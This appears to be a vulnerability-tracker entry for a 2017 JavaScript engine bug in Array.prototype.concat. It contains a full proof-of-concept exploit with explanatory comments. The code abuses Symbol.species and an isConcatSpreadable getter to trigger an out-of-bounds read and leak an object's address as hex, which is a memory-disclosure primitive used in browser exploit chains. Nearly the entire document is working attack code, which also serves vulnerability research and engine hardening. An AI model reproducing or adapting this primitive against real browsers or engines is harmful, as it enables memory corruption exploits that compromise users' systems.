- Fix: Aug 2017
- Credit: Hao Linan of Qihoo 360 Vulcan Team, HyungSeok Han, @daramg of KAIST SoftSec
PoC (from @daramg):
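/**
 * Render a number as the 16-digit hex string of its IEEE-754 double
 * encoding, most significant byte first. The bytes are taken from a
 * Uint8Array view over the Float64Array store, so the order depends on the
 * host's byte order (little-endian on x86/ARM, which is why byte 7 is
 * emitted first).
 *
 * Fixes two defects of the original: `ret` started as the number 0, so every
 * result carried a spurious leading "0", and each byte was emitted with
 * `toString(16)` unpadded, so bytes below 0x10 lost a digit and the string
 * no longer mapped back to the 8 bytes. The original also leaked `a`, `b`,
 * `c`, `ret` and `i` as implicit globals (and `a` collides with the
 * top-level `a` in this script).
 *
 * @param {number} data - value to encode; non-numbers are coerced by the
 *   Float64Array store (objects and undefined become NaN).
 * @returns {string} 16 lowercase hex digits, two per byte.
 */
function convert(data) {
  const buf = new ArrayBuffer(8);
  const asDouble = new Float64Array(buf);
  const asBytes = new Uint8Array(buf);
  asDouble[0] = data;
  let hex = '';
  // Walk from byte 7 down to byte 0 so the output reads MSB-first on a
  // little-endian host; padStart keeps every byte at exactly two digits.
  for (let i = 7; i >= 0; i--) {
    hex += asBytes[i].toString(16).padStart(2, '0');
  }
  return hex;
}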
// PoC trigger for the Array.prototype.concat bug this entry records (fixed
// Aug 2017 per the header). What the code sets up, read as a defender:
// concat is made to allocate its result through a user-supplied
// Symbol.species constructor that hands back a 3-element array although the
// source a1 holds 0x100 elements, and an accessor on Symbol.isConcatSpreadable
// runs user code while concat is already in progress, mutating both that
// result array and a2. On an affected engine the final read res[256] is
// presumably past the end of the 3-element result; on a fixed engine concat
// re-validates after the callbacks and the read yields an ordinary value.
// The engine-side mitigation is to re-check the result array's length and
// representation after any user callback. Note the implicit global
// `new_array` shared between the two callbacks — throwaway PoC code, not a
// library.
//
// @param {*} target - value stored into a2[0] from inside the getter; the
//   caller passes an array. Whatever res[256] yields is run through
//   convert(), so the return value is a hex string.
function leak(target){
var a1 = [];
// 0x100 integer elements: concat will try to write at least this many slots
// into whatever Symbol.species returns.
for (var i = 0; i < 0x100; i++) {
a1[i] = i;
}
var a2 = [1234,1234];
var c = new Function();
// Species constructor: concat uses this to create its result array and gets
// back a fixed 3-element array rather than one sized for 0x102 elements.
c[Symbol.species] = function() {
new_array = [99,99,99];
return new_array;
};
a1.constructor = c;
// IsConcatSpreadable is consulted per argument after the result array has
// been created (spec order), so this getter runs mid-operation. Storing a
// double into new_array is intended to change the array's internal element
// representation; a2[0] is replaced by the caller's target before a2 is
// copied. Returning true keeps a2 spreadable.
a2.__defineGetter__(Symbol.isConcatSpreadable, function () {
new_array[0] = 4.2;
a2[0] = target
return true;
});
var res = a1.concat(a2);
// Index 256 is beyond the 3 elements new_array was created with; convert()
// renders whatever comes back as the hex of its double encoding.
return convert(res[256]) ;
}
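// Driver. The original used implicit globals and named the target `a`,
// which the original convert() also assigned (`a = new ArrayBuffer(8)`), so
// the global was clobbered on the first call; block-scoped names avoid both
// the implicit globals and the collision.
// targetArray is the object stored into a2[0] by leak(); the printed value
// is the hex string leak() gets back from convert().
const targetArray = [1, 2, 3];
const leaked = leak(targetArray);
console.log(leaked);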